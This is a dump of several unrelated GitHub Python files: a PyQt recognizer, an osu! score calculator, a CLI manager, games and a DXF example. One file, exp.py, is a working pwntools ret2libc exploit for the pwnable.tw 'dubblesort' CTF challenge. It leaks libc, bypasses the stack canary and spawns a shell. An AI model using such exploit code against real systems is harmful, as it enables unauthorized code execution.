self.txtNumIterations)\n\n\t\tform.setLayout(formLayout)\n\t\tlayout.addWidget(form)\n\n\n\t\tbuttonBar = QtGui.QWidget()\n\t\tbuttonBarLayout = QtGui.QHBoxLayout()\n\t\tself.btnTrain = QtGui.QPushButton(self.trUtf8(\"Iniciar treinamento\"))\n\t\tself.btnTrain.clicked.connect(self.doTrain)\n\t\t\n\t\tself.btnSaveTrain = QtGui.QPushButton(self.trUtf8(\"Salvar treinamento\"))\n\t\tself.btnSaveTrain.clicked.connect(self.doSaveTrain)\n\n\t\tbuttonBarLayout.addWidget(self.btnTrain)\n\t\tbuttonBarLayout.addWidget(self.btnSaveTrain)\n\t\tbuttonBar.setLayout(buttonBarLayout)\n\n\t\tlayout.addWidget(buttonBar)\n\n\t\tself.progressBar = QtGui.QProgressBar()\n\t\tlayout.addWidget(self.progressBar)\n\t\t\n\t\ttrainScreen.setLayout(layout)\n\n\t\treturn trainScreen\n\t\n\tdef buildRecognizeScreen(self):\n\t\trecognizeScreen = QtGui.QGroupBox(self.trUtf8(\"Reconhecimento\"))\n\n\t\tlayout = QtGui.QVBoxLayout()\n\n\t\tform = QtGui.QWidget()\n\t\tformLayout = QtGui.QFormLayout()\n\t\n\t\tfileInput = QtGui.QWidget()\n\t\tfileInputLayout = QtGui.QHBoxLayout()\n\t\tself.txtRecogFilePath = QtGui.QLineEdit()\n\t\tself.btnRecogSelectFile = QtGui.QPushButton(self.trUtf8(\"Arquivo...\"))\n\t\tself.btnRecogSelectFile.clicked.connect(self.selectFileTrain)\n\t\tfileInputLayout.addWidget(self.txtRecogFilePath)\n\t\tfileInputLayout.addWidget(self.btnRecogSelectFile)\n\t\tfileInput.setLayout(fileInputLayout)\n\t\tformLayout.addRow(self.trUtf8(\"Arquivo de treinamento: \"), fileInput)\n\n\t\tform.setLayout(formLayout)\n\t\tlayout.addWidget(form)\n\n\t\tself.btnLoadTrainFile = QtGui.QPushButton(self.trUtf8(\"Carregar treinamento selecionado\"))\n\t\tself.btnLoadTrainFile.clicked.connect(self.loadTrain)\n\t\tlayout.addWidget(self.btnLoadTrainFile)\n\n\t\tself.lblLoadedTrain = QtGui.QLabel(self.trUtf8(\"Não há treinamento carregado!\"))\n\t\tself.lblLoadedTrain.setStyleSheet(\"QLabel { color: red; font-style: italic; }\")\n\t\tlayout.addWidget(self.lblLoadedTrain)\n\n\t\tself.buttonPadList = []\n\t\tbuttonPadLayout = QtGui.QGridLayout()\n\n\t\tfor j in range(RecognizerWindow.LIN_QTY):\n\t\t\tline = []\n\t\t\tfor i in range(RecognizerWindow.COL_QTY):\n\t\t\t\tbutton = QtGui.QPushButton()\n\t\t\t\tbutton.setCheckable(True)\n\t\t\t\tbutton.setMaximumSize(30,30)\n\t\t\t\tbutton.setStyleSheet(\"QPushButton:checked { background-color: navy; }\")\n\t\t\t\tline.append(button)\n\t\t\t\tbuttonPadLayout.addWidget(button, j, i)\n\t\t\n\t\t\tself.buttonPadList.append(line)\n\n\t\tbuttonPad = QtGui.QWidget()\n\t\tbuttonPad.setLayout(buttonPadLayout)\n\t\tlayout.addWidget(buttonPad)\n\n\t\tself.btnRecogPattern = QtGui.QPushButton(self.trUtf8(\"Reconhecer padrão\"))\n\t\tself.btnRecogPattern.clicked.connect(self.recognize)\n\t\tlayout.addWidget(self.btnRecogPattern)\n\n\t\tresultBox = QtGui.QWidget()\n\t\tresultLayout = QtGui.QVBoxLayout()\n\t\tself.lblResultText = QtGui.QLabel(self.trUtf8(\"Resultado\"))\n\t\tresultLayout.addWidget(self.lblResultText)\n\n\t\tself.lblResult = QtGui.QLabel()\n\t\tself.lblResult.setStyleSheet(\"QLabel { font-size: 40px; color: orange; }\")\n\t\tresultLayout.addWidget(self.lblResult)\n\t\tresultBox.setLayout(resultLayout)\n\n\t\tlayout.addWidget(resultBox)\n\n\t\trecognizeScreen.setLayout(layout)\n\n\t\treturn recognizeScreen\n\n\tdef buildMainScreen(self):\n\t\tmainScreen = QtGui.QVBoxLayout()\n\n\t\tmainScreen.addWidget(self.buildTrainScreen())\n\t\tmainScreen.addWidget(self.buildRecognizeScreen())\n\n\t\treturn mainScreen\n\n\tdef selectFilePatt(self):\n\t\tfilename = 
QtGui.QFileDialog.getOpenFileName(self,\\\n\t\t\tself.trUtf8(\"Selecionar arquivo\"), \"\",\\\n\t\t\tself.trUtf8(\"Text files (*.txt)\"))\n\n\t\tif filename:\n\t\t\tself.txtFilePath.setText(filename[0])\n\t\n\tdef selectFileTrain(self):\n\t\tfilename = QtGui.QFileDialog.getOpenFileName(self,\\\n\t\t\tself.trUtf8(\"Selecionar arquivo\"), \"\",\\\n\t\t\tself.trUtf8(\"Train files (*.trn)\"))\n\n\t\tif filename:\n\t\t\tself.txtRecogFilePath.setText(filename[0])\n\t\n\tdef doTrain(self):\n\t\tnumberIterations = self.txtNumIterations.value()\n\t\tself.progressBar.reset()\n\t\tself.progressBar.setRange(0, numberIterations - 1)\n\t\tself.neuralNet.train(self.txtFilePath.text(), self.txtNumNeurons.value(),\\\n\t\t\tself.txtLearningRate.value(), numberIterations,\tself.progressBar)\n\n\t\tself.trained = True\n\t\tself.updateLabelTrain()\n\n\tdef doSaveTrain(self):\n\t\tfilename = QtGui.QFileDialog.getSaveFileName(self,\\\n\t\t\tself.trUtf8(\"Salvar treinamento\"), \"\", \\\n\t\t\tself.trUtf8(\"Train files (*.trn)\"))\n\n\t\tnetFileName = filename[0]\n\t\tif filename\\\n\t\t\tand netFileName.find(\".trn\") == len(netFileName) - 4:\n\t\t\tnetFileName = netFileName + \".trn\"\n\n\t\tself.neuralNet.exportNet(netFileName)\n\t\n\tdef loadTrain(self):\n\t\tfilename = self.txtRecogFilePath.text()\n\n\t\tif filename:\n\t\t\tself.neuralNet.importNet(filename)\n\n\t\tself.trained = True\n\t\tself.updateLabelTrain()\n\t\n\tdef recognize(self):\n\t\tif self.trained:\n\t\t\tpattern = StringIO.StringIO()\n\n\t\t\tfor l in self.buttonPadList:\n\t\t\t\tfor item in l:\n\t\t\t\t\tif item.isChecked():\n\t\t\t\t\t\tpattern.write(\"1\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tpattern.write(\"0\")\n\n\t\t\tres = self.neuralNet.recognize(pattern.getvalue())\n\t\t\tpattern.close()\n\n\t\t\tself.lblResult.setText(self.answers.get(res))\n\t\n\tdef updateLabelTrain(self):\n\t\tif self.trained:\n\t\t\tself.lblLoadedTrain.setText(self.trUtf8(\"Treinamento carregado!\"))\n\t\t\tself.lblLoadedTrain.setStyleSheet(\" QLabel { color: navy; font-weight: bold; }\")\n\nif __name__ == \"__main__\":\n\tapp = QtGui.QApplication(sys.argv)\n\n\tr = RecognizerWindow()\n\tr.show()\n\n\tapp.exec_()\n\tsys.exit()\n","repo_name":"stormqueen1990/plate-recognizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"42895895001","text":"from pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\ncontext.terminal = ['tmux', 'splitw', '-h']\n\np = remote('chall.pwnable.tw', 10101)\n#p = process('./dubblesort')\nelf = ELF('./dubblesort')\nlibc = ELF('./libc_32.so.6')\n\np.recvuntil(b':')\np.sendline(b'a' * 28)\n\np.recvline()\nlibc_base = u32(b'\\x00' + p.recv(3)) - 0x1b0000\nprint('libc base:', hex(libc_base))\n\nsystem = libc_base + libc.symbols['system']\nbin_sh = libc_base + next(libc.search(b'/bin/sh'))\n\np.recvuntil(b':')\np.sendline(str(24 + 1 + 9 + 1))\nfor i in range(24):\n p.recvuntil(b'number :')\n p.sendline(b'0')\n\np.recvuntil(b'number :')\np.sendline(b'+')\n\nfor i in range(9):\n p.recvuntil(b'number :')\n p.sendline(str(system))\n\np.recvuntil(b'number :')\np.sendline(str(bin_sh))\n\np.interactive()","repo_name":"qingwei4/CTF-Solve","sub_path":"pwnable_tw_dubblesort/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32631984717","text":"from __future__ import 
annotations\n\nimport math\nfrom typing import Optional\nfrom typing import TypedDict\n\ntry: # TODO: ask asottile about this\n from oppai_ng.oppai import OppaiWrapper\nexcept ModuleNotFoundError:\n pass # utils will handle this for us\n\nfrom peace_performance_python.objects import Beatmap as PeaceMap\nfrom peace_performance_python.objects import Calculator as PeaceCalculator\n\n\nclass DifficultyRating(TypedDict):\n performance: float\n star_rating: float\n\n\nclass StdTaikoCatchScore(TypedDict):\n mods: Optional[int]\n acc: Optional[float]\n combo: Optional[int]\n nmiss: Optional[int]\n\n\nclass ManiaScore(TypedDict):\n mods: Optional[int]\n score: Optional[int]\n\n\ndef calculate_performances_std(\n osu_file_path: str,\n scores: list[StdTaikoCatchScore],\n) -> list[DifficultyRating]:\n with OppaiWrapper() as calculator:\n calculator.set_mode(0)\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n if score[\"mods\"] is not None:\n calculator.set_mods(score[\"mods\"])\n\n if score[\"nmiss\"] is not None:\n calculator.set_nmiss(score[\"nmiss\"])\n\n if score[\"combo\"] is not None:\n calculator.set_combo(score[\"combo\"])\n\n if score[\"acc\"] is not None:\n calculator.set_accuracy_percent(score[\"acc\"])\n\n calculator.calculate(osu_file_path)\n\n pp = calculator.get_pp()\n sr = calculator.get_sr()\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\ndef calculate_performances_taiko(\n osu_file_path: str,\n scores: list[StdTaikoCatchScore],\n) -> list[DifficultyRating]:\n beatmap = PeaceMap(osu_file_path) # type: ignore\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n calculator = PeaceCalculator(\n {\n \"mode\": 1,\n \"mods\": score[\"mods\"],\n \"acc\": score[\"acc\"],\n \"combo\": score[\"combo\"],\n \"nmiss\": score[\"nmiss\"],\n },\n )\n\n result = calculator.calculate(beatmap)\n\n pp = result.pp\n sr = result.stars\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\ndef calculate_performances_catch(\n osu_file_path: str,\n scores: list[StdTaikoCatchScore],\n) -> list[DifficultyRating]:\n beatmap = PeaceMap(osu_file_path) # type: ignore\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n calculator = PeaceCalculator(\n {\n \"mode\": 2,\n \"mods\": score[\"mods\"],\n \"acc\": score[\"acc\"],\n \"combo\": score[\"combo\"],\n \"nmiss\": score[\"nmiss\"],\n },\n )\n\n result = calculator.calculate(beatmap)\n\n pp = result.pp\n sr = result.stars\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\ndef calculate_performances_mania(\n osu_file_path: str,\n scores: list[ManiaScore],\n) -> list[DifficultyRating]:\n beatmap = PeaceMap(osu_file_path) # type: ignore\n\n results: list[DifficultyRating] = []\n\n for score in scores:\n calculator = PeaceCalculator(\n {\n \"mode\": 3,\n \"mods\": score[\"mods\"],\n \"score\": score[\"score\"],\n },\n )\n\n result = calculator.calculate(beatmap)\n\n pp = result.pp\n sr = result.stars\n\n if math.isnan(pp) or math.isinf(pp):\n # TODO: report to logserver\n pp = 0.0\n sr = 0.0\n else:\n pp = 
round(pp, 5)\n\n results.append(\n {\n \"performance\": pp,\n \"star_rating\": sr,\n },\n )\n\n return results\n\n\nclass ScoreDifficultyParams(TypedDict, total=False):\n # std, taiko, catch\n acc: float\n combo: int\n nmiss: int\n\n # mania\n score: int\n\n\ndef calculate_performances(\n osu_file_path: str,\n mode: int,\n mods: Optional[int],\n scores: list[ScoreDifficultyParams],\n) -> list[DifficultyRating]:\n if mode in (0, 1, 2):\n std_taiko_catch_scores: list[StdTaikoCatchScore] = [\n {\n \"mods\": mods,\n \"acc\": score.get(\"acc\"),\n \"combo\": score.get(\"combo\"),\n \"nmiss\": score.get(\"nmiss\"),\n }\n for score in scores\n ]\n\n if mode == 0:\n results = calculate_performances_std(\n osu_file_path=osu_file_path,\n scores=std_taiko_catch_scores,\n )\n elif mode == 1:\n results = calculate_performances_taiko(\n osu_file_path=osu_file_path,\n scores=std_taiko_catch_scores,\n )\n elif mode == 2:\n results = calculate_performances_catch(\n osu_file_path=osu_file_path,\n scores=std_taiko_catch_scores,\n )\n\n elif mode == 3:\n mania_scores: list[ManiaScore] = [\n {\n \"mods\": mods,\n \"score\": score.get(\"score\"),\n }\n for score in scores\n ]\n\n results = calculate_performances_mania(\n osu_file_path=osu_file_path,\n scores=mania_scores,\n )\n else:\n raise NotImplementedError\n\n return results\n","repo_name":"divinity1437/bancho.py","sub_path":"app/usecases/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"20126067111","text":"# -*- coding: utf-8 -*-\n\"\"\"Main command line application.\n\nAttributes\n----------\ndocopt_doc : str\n Used to store/define the docstring that will be passed to docopt as the \"doc\" argument.\nroot_folder : str\n The main folder containing the application. All commands must be executed from this location\n without exceptions.\n\"\"\"\n\nimport os\nimport sys\n\nfrom . import app_utils\nfrom .__init__ import __appdescription__\nfrom .__init__ import __appname__\nfrom .__init__ import __status__\nfrom .__init__ import __version__\nfrom .python_utils import cli_utils\n\nroot_folder = os.path.realpath(os.path.abspath(os.path.join(\n os.path.normpath(os.path.join(os.path.dirname(__file__), *([os.pardir] * 2))))))\n\ndocopt_doc = \"\"\"{appname} {version} ({status})\n\n{appdescription}\n\nUsage:\n app.py (-h | --help | --manual | --version)\n app.py app_repos (submodules | subtrees) (init | update)\n [-a ... | --app=...]\n [--dry-run]\n app.py bump_app_version [-a ... | --app=...]\n app.py gen_base_app\n app.py (gen_docs | gen_docs_no_api) [-f | --force-clean-build]\n [-u | --update-inventories]\n app.py gen_man_pages [-a ... | --app=...]\n app.py gen_readmes\n app.py gen_sys_exec_all\n app.py gen_sys_exec_self\n app.py install_deps [-a ... | --app=...]\n [-e | --pip-exec=]\n app.py print_all_apps\n app.py repo (submodules | subtrees) (init | update) [--dry-run]\n app.py run_cmd_on_app (-c | --command=)\n [-p | --parallel ]\n [-a ... | --app=...]\n app.py spacefm_find_files\n\nOptions:\n\n-h, --help\n Show this application basic help.\n\n--manual\n Show this application manual page.\n\n--version\n Show application version.\n\n-a, --app=\n Specify one or more application name to work with. 
If this option isn't\n specified on the commands that make use of it, the command will work with\n all available applications.\n\n-c , --command=\n Command to execute inside a managed application folder.\n\n--dry-run\n Do not perform file system changes. Only display messages informing of the\n actions that will be performed or commands that will be executed.\n\n-e , --pip-exec=\n For use with the **install_deps** command. Path or name of the **pip**\n command to use to install dependencies.\n\n-f, --force-clean-build\n Clear doctree cache and destination folder when building the documentation.\n\n-p, --parallel\n Run command in parallel instead of after finishing each command execution.\n\n-u, --update-inventories\n Update inventory files from their on-line resources when building the\n documentation. Inventory files will be updated automatically if they don't\n already exist.\n\n\"\"\".format(appname=__appname__,\n appdescription=__appdescription__,\n version=__version__,\n status=__status__)\n\n\nclass CommandLineInterface(cli_utils.CommandLineInterfaceSuper):\n \"\"\"Command line interface.\n\n It handles the arguments parsed by the docopt module.\n\n Attributes\n ----------\n a : dict\n Where docopt_args is stored.\n action : method\n Set the method that will be executed when calling CommandLineInterface.run().\n repo_action : str\n Which action to perform on a repository.\n \"\"\"\n action = None\n repo_action = None\n app_slugs = []\n\n def __init__(self, docopt_args):\n \"\"\"Initialize.\n\n Parameters\n ----------\n docopt_args : dict\n The dictionary of arguments as returned by docopt parser.\n \"\"\"\n self.a = docopt_args\n self._cli_header_blacklist = [\n self.a[\"spacefm_find_files\"],\n self.a[\"--manual\"],\n self.a[\"print_all_apps\"]\n ]\n\n super().__init__(__appname__, \"UserData/0_manager/logs\")\n\n self.app_slugs = list(set(self.a[\"--app\"]))\n\n if self.a[\"spacefm_find_files\"]:\n self.action = self.spacefm_find_files\n elif self.a[\"print_all_apps\"]:\n self.action = self.print_all_apps\n elif self.a[\"--manual\"]:\n self.action = self.display_manual_page\n elif self.a[\"bump_app_version\"]:\n self.logger.info(\"**Bumping applications' versions...**\")\n self.action = self.bump_versions\n elif self.a[\"gen_base_app\"]:\n self.logger.info(\"**New application generation...**\")\n self.action = self.generate_base_app\n elif self.a[\"gen_docs\"] or self.a[\"gen_docs_no_api\"]:\n self.logger.info(\"**Documentation generation...**\")\n self.action = self.generate_docs\n elif self.a[\"gen_man_pages\"]:\n self.logger.info(\"**Generating manual pages...**\")\n self.action = self.generate_man_pages\n elif self.a[\"gen_readmes\"]:\n self.logger.info(\"**Generating READMEs...**\")\n self.action = self.generate_readmes\n elif self.a[\"gen_sys_exec_all\"]:\n self.logger.info(\"**System executable generation for all applications...**\")\n self.action = self.system_executable_generation_all\n elif self.a[\"gen_sys_exec_self\"]:\n self.logger.info(\"**System executable generation...**\")\n self.action = self.system_executable_generation_self\n elif self.a[\"install_deps\"]:\n self.logger.info(\"**Installing dependencies...**\")\n self.action = self.install_dependencies\n elif self.a[\"run_cmd_on_app\"]:\n self.logger.info(\"**Running command on selected applications...**\")\n self.action = self.run_cmd_on_apps\n elif self.a[\"repo\"] or self.a[\"app_repos\"]:\n self.repo_action = \"init\" if self.a[\"init\"] else \"update\" if self.a[\"update\"] else \"\"\n\n if 
self.a[\"submodules\"]:\n if self.a[\"app_repos\"]:\n self.logger.info(\"**Managing application repositories sub-modules...**\")\n self.action = self.manage_app_repos_submodules\n elif self.a[\"repo\"]:\n self.logger.info(\"**Managing repository sub-modules...**\")\n self.action = self.manage_repo_submodules\n elif self.a[\"subtrees\"]:\n if self.a[\"app_repos\"]:\n self.logger.info(\"**Managing application repositories sub-trees...**\")\n self.action = self.manage_app_repos_subtrees\n elif self.a[\"repo\"]:\n self.logger.info(\"**Managing repository sub-trees...**\")\n self.action = self.manage_repo_subtrees\n\n def run(self):\n \"\"\"Execute the assigned action stored in self.action if any.\n \"\"\"\n if self.action is not None:\n self.action()\n sys.exit(0)\n\n def bump_versions(self):\n \"\"\"See :any:`app_utils.bump_versions`\n \"\"\"\n app_utils.bump_versions(self.app_slugs, logger=self.logger)\n\n def generate_base_app(self):\n \"\"\"See :any:`app_utils.BaseAppGenerator`\n \"\"\"\n base_app_generetor = app_utils.BaseAppGenerator(logger=self.logger)\n base_app_generetor.generate()\n\n def generate_docs(self):\n \"\"\"See :any:`sphinx_docs_utils.generate_docs`\n \"\"\"\n app_utils.generate_docs(generate_api_docs=self.a[\"gen_docs\"],\n update_inventories=self.a[\"--update-inventories\"],\n force_clean_build=self.a[\"--force-clean-build\"],\n logger=self.logger)\n\n def install_dependencies(self):\n \"\"\"See :any:`app_utils.install_dependencies`\n \"\"\"\n app_utils.install_dependencies(app_slugs=self.app_slugs,\n pip_exec=self.a[\"--pip-exec\"],\n logger=self.logger)\n\n def generate_readmes(self):\n \"\"\"See :any:`app_utils.generate_readmes`\n \"\"\"\n app_utils.generate_readmes(self.logger)\n\n def run_cmd_on_apps(self):\n \"\"\"See :any:`app_utils.run_cmd_on_apps`\n \"\"\"\n app_utils.run_cmd_on_apps(self.a[\"--command\"],\n run_in_parallel=self.a[\"--parallel\"],\n app_slugs=self.app_slugs,\n logger=self.logger)\n\n def system_executable_generation_self(self):\n \"\"\"See :any:`cli_utils.CommandLineInterfaceSuper._system_executable_generation`.\n \"\"\"\n self._system_executable_generation(\n exec_name=\"apps-manager-cli\",\n app_root_folder=root_folder,\n sys_exec_template_path=os.path.join(\n root_folder, \"AppData\", \"data\", \"templates\", \"system_executable\"),\n bash_completions_template_path=os.path.join(\n root_folder, \"AppData\", \"data\", \"templates\", \"bash_completions.bash\"),\n logger=self.logger\n )\n\n def system_executable_generation_all(self):\n \"\"\"See :any:`app_utils.system_executable_generation_for_all_apps`\n \"\"\"\n app_utils.system_executable_generation_for_all_apps(logger=self.logger)\n\n def manage_repo_submodules(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n from .python_utils import git_utils\n\n git_utils.manage_repo(\n \"submodule\",\n self.repo_action,\n cwd=root_folder,\n dry_run=self.a[\"--dry-run\"],\n logger=self.logger\n )\n\n def manage_repo_subtrees(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n self.logger.warning(\"**Not using sub-trees in this application for now.**\")\n\n def manage_app_repos_submodules(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n self.logger.warning(\"**Not using sub-modules in applications for now.**\")\n\n def manage_app_repos_subtrees(self):\n \"\"\"See :any:`git_utils.manage_repo`\n \"\"\"\n app_utils.manage_app_repos_subtrees(self.repo_action,\n app_slugs=self.app_slugs,\n dry_run=self.a[\"--dry-run\"],\n logger=self.logger)\n\n def display_manual_page(self):\n 
\"\"\"See :any:`cli_utils.CommandLineInterfaceSuper._display_manual_page`.\n \"\"\"\n self._display_manual_page(os.path.join(root_folder, \"AppData\", \"data\", \"man\", \"app.py.1\"))\n\n def generate_man_pages(self):\n \"\"\"See :any:`app_utils.generate_man_pages`\n \"\"\"\n app_utils.generate_man_pages(app_slugs=self.app_slugs,\n logger=self.logger)\n\n def print_all_apps(self):\n \"\"\"See :any:`app_utils.print_all_apps`\n \"\"\"\n app_utils.print_all_apps()\n\n def spacefm_find_files(self):\n \"\"\"See :any:`app_utils.spacefm_find_files`\n \"\"\"\n app_utils.spacefm_find_files()\n\n\ndef main():\n \"\"\"Initialize command line interface.\n \"\"\"\n cli_utils.run_cli(flag_file=\".cli-applications-manager.flag\",\n docopt_doc=docopt_doc,\n app_name=__appname__,\n app_version=__version__,\n app_status=__status__,\n cli_class=CommandLineInterface)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"Odyseus/CLIApplicationsManager","sub_path":"AppData/python_modules/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":11431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33780004081","text":"c = input(\"ievadi, lūdzu kartec numuru: \")\nc1 = list(c)\n\nif c1[0] ==\"4\":\n print(\"VISA\")\nelif c1[0]==\"5\":\n print(\"Mastercard\")\nelif c1[0]==\"3\":\n print(\"American Express\")\n\nelse:\n print(\"Card NOT valid\")\n\n\n","repo_name":"AleksandrZelukin/macibu_programmas","sub_path":"10kl_progs/credit_card.py","file_name":"credit_card.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36366428259","text":"import pygame, sys\r\nfrom pygame.locals import *\r\nimport math \r\nimport time\r\nimport random\r\npygame.init()\r\n\r\ngreen=(10,200,10)\r\nred=(255,0,0)\r\n\r\ndisplay=pygame.display.set_mode((1000,600))\r\npygame.display.set_caption(\"Pangolin\")\r\npanimage=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/pangolin.png\")\r\nbackground=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/forest.jpg\")\r\npangolin_width=64\r\n\r\n\r\n\r\n\r\ndef food(ant_startx,ant_starty,ant):\r\n\tif ant==0:\r\n\t\tant_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/ant1.jpg\")\r\n\tif ant==1:\r\n\t\tant_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/ant2.jpg\")\r\n\tif ant==2:\r\n\t\tant_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/ant3.jpg\")\r\n\tdisplay.blit(ant_come,(ant_startx,ant_starty)) \r\n\r\ndef hunterx(hunter_startx,hunter_starty,hunter):\r\n\tif hunter==0:\r\n\t\thunter_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/hunter.jpg\")\r\n\tif hunter==1:\r\n\t\thunter_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/trap.png\")\r\n\tif hunter==2:\r\n\t\thunter_come=pygame.image.load(\"C:/Users/Admin/Documents/code/Pygame/Resources/images/nettrap.png\")\r\n\r\n\tdisplay.blit(hunter_come,(hunter_startx,hunter_starty))\t\t\r\n\r\nfont=pygame.font.Font(\"freesansbold.ttf\",32)\r\nax=10\r\nay=10\r\n\r\nscore_value = 0\r\ndef show_score(score_x,score_y):\r\n\tscore=font.render(\"SCORE: \" + str(score_value), True, (255,255,255))\r\n\tdisplay.blit(score,(score_x,score_y))\r\n\r\ndef death():\r\n\tmessage_display(\"Oops!\")\r\n\r\ndef 
message_display(text):\r\n\tlargetext=pygame.font.Font(\"freesansbold.ttf\",80)\r\n\ttextsurf,textrect=text_object(text,largetext)\r\n\ttextrect.center=((400),(300))\r\n\tdisplay.blit(textsurf,textrect)\r\n\tpygame.display.update()\r\n\ttime.sleep(3)\r\n\tloop()\r\n\r\ndef text_object(text,font):\r\n\ttextsurface=font.render(text,True,red)\r\n\treturn textsurface,textsurface.get_rect()\r\n\r\n\r\ndef pangolin(x,y):\r\n\tdisplay.blit(panimage, (x,y))\r\n\r\ndef loop():\r\n\r\n\tx=500\r\n\ty=500\r\n\tx_change=0\r\n\ty_change=0\r\n\thunter_speed=5\r\n\thunter=0\r\n\thunter_startx=random.randrange(130,(1000-pangolin_width))\r\n\thunter_starty=-600\r\n\thunter_width=28\r\n\thunter_height=50\r\n\tant_speed=5\r\n\tant=0\r\n\tant_startx=random.randrange(130,(1000-pangolin_width))\r\n\tant_starty=-600\r\n\tant_width=20\r\n\tant_height=20\r\n\r\n\r\n\r\n\tbumped=False\r\n\twhile not bumped:\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type==pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tquit()\r\n\r\n\t\tkeys = pygame.key.get_pressed()\r\n\t\tif keys[pygame.K_LEFT] and x>0:\r\n\t\t\tx-=5\r\n\t\tif keys[pygame.K_RIGHT] and x<1000-pangolin_width: \r\n\t\t\tx+=5\r\n\r\n\t\tdisplay.fill(green)\r\n\t\tdisplay.blit(background,(0,0))\r\n\t\thunter_starty-=(hunter_speed/4)\r\n\t\thunterx(hunter_startx,hunter_starty,hunter)\r\n\t\thunter_starty+=hunter_speed\r\n\t\tant_starty-=(ant_speed/4)\r\n\t\tfood(ant_startx,ant_starty,ant)\r\n\t\tant_starty+= ant_speed\r\n\t\tpangolin(x,y)\r\n\t\tif x<0 or x>1000-pangolin_width:\r\n\t\t\tx_change=0\r\n\t\tif ant_starty>600:\r\n\t\t\tant_starty=0-ant_height\r\n\t\t\tant_startx=random.randrange(130,(1000-300))\r\n\t\t\tant=random.randrange(0,2)\r\n\t\tif hunter_starty>600:\r\n\t\t\thunter_starty=0-hunter_height\r\n\t\t\thunter_startx=random.randrange(130,(1000-300))\r\n\t\t\thunter=random.randrange(0,2)\r\n\r\n\t\tif y= hunter_startx and x <= hunter_startx + hunter_width:\r\n\t\t\t\tdeath() \r\n\t\t\tif x + pangolin_width >= hunter_startx and x + pangolin_width <= hunter_width + hunter_startx:\r\n\t\t\t\tdeath()\r\n\t\t\tif x < hunter_startx and hunter_startx + hunter_width < x + pangolin_width:\r\n\t\t\t\tdeath()\r\n\t\r\n\t\tif y\"\r\n\r\nimport sys\r\nimport os\r\n\r\ntry:\r\n import dxfwrite\r\nexcept ImportError:\r\n # if dxfwrite is not 'installed' append parent dir of __file__ to sys.path\r\n import os\r\n curdir = os.path.dirname(os.path.abspath(__file__))\r\n sys.path.insert(0, os.path.abspath(os.path.join(curdir, os.path.pardir)))\r\n\r\nimport dxfwrite\r\nfrom dxfwrite import DXFEngine as dxf\r\nfrom dxfwrite.vector2d import vadd\r\n\r\ndef draw_control_point(point, tangent1, tangent2=(0, 0)):\r\n tp1 = vadd(point, tangent1)\r\n tp2 = vadd(point, tangent2)\r\n dwg.add(dxf.circle(0.05, center=point, color=1))\r\n dwg.add(dxf.line(point, tp1, color=2))\r\n dwg.add(dxf.line(point, tp2, color=2))\r\n\r\nname = 'bezier.dxf'\r\ndwg = dxf.drawing(name)\r\nbezier = dxf.bezier(color=4)\r\ndwg.add(bezier)\r\n\r\n# define start point\r\nbezier.start((2, 4), tangent=(0, 2))\r\ndraw_control_point((2, 4), (0, 2))\r\n\r\n# append first point\r\nbezier.append((6, 7), tangent1=(-2, 0), tangent2=(1, 2))\r\ndraw_control_point((6, 7), (-2, 0), (1, 2))\r\n\r\n# tangent2 = -tangent1 = (+2, 0)\r\nbezier.append((12, 5), tangent1=(-2, 0))\r\ndraw_control_point((12, 5), (-2, 0), (2, 0))\r\n\r\n# for last point tangent2 is meaningless\r\nbezier.append((16, 9), tangent1=(-0.5, -3))\r\ndraw_control_point((16, 9), (-0.5, -3))\r\ndwg.save()\r\nprint(\"drawing '%s' 
